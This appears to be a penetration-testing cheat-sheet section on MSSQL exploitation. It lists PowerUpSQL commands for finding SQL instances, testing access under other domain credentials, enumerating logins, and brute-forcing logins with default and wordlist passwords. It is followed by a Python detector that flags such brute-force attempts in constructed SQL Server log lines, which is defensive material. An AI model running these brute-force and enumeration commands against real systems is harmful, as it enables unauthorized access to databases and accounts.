
03. Exploitation

Brute-forcing

Check if current domain user has access to DB

Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

Check if another domain user has access to DB

runas /noprofile /netonly /user:<domain\username> powershell.exe
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Verbose

Fuzzing logins:

Get-SQLFuzzServerLogin -Instance ops-mssql -Verbose

This is equivalent to:

SELECT SUSER_NAME(1)
SELECT SUSER_NAME(2)
SELECT SUSER_NAME(3)

BruteForce:

Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Username sa -Password Password -Verbose
$comps = $(Get-SQLInstanceDomain).ComputerName
$comps | Invoke-BruteForce -UserList C:\dict\users.txt -PasswordList C:\dict\passwords.txt -Service SQL -Verbose
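From the defender's side, the login attempts produced by the fuzzing and brute-force commands above appear in the SQL Server error log as error 18456 "Login failed for user" entries. The detector below is an added example, not part of the original page or of PowerUpSQL; it parses constructed ERRORLOG-style lines and flags a client address that produces many failures, across several login names, within a short window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample in SQL Server ERRORLOG style; not real data.
SAMPLE_LOG = """\
2024-03-10 09:00:01.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-03-10 09:00:01.40 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-03-10 09:00:02.00 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 10.0.0.5]
2024-03-10 09:00:02.30 Logon       Login failed for user 'backup'. Reason: Could not find a login matching the name provided. [CLIENT: 10.0.0.5]
2024-03-10 09:00:02.90 Logon       Login failed for user 'svc_sql'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]
2024-03-10 09:30:00.00 Logon       Login failed for user 'CORP\\alice'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.9]
"""

# Timestamp, login name and client address of a failed-login entry.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+ Logon\s+"
    r"Login failed for user '(?P<user>[^']+)'\..*\[CLIENT: (?P<client>[^\]]+)\]"
)

def parse_failed_logins(text):
    """Return a list of (timestamp, user, client) tuples for failed-login lines."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
            events.append((ts, m["user"], m["client"]))
    return events

def detect_bruteforce(events, window=timedelta(minutes=5), min_failures=5):
    """Map each client that reaches min_failures failed logins inside one
    sliding window to (failure_count, sorted distinct login names)."""
    by_client = defaultdict(list)
    for ts, user, client in events:
        by_client[client].append((ts, user))
    hits = {}
    for client, evs in by_client.items():
        evs.sort()
        for i in range(len(evs)):
            j = i
            while j < len(evs) and evs[j][0] - evs[i][0] <= window:
                j += 1
            if j - i >= min_failures:
                hits[client] = (j - i, sorted({u for _, u in evs[i:j]}))
                break
    return hits
```

The distinct-user list separates a password spray or login fuzz (many names from one client) from a single user mistyping a password.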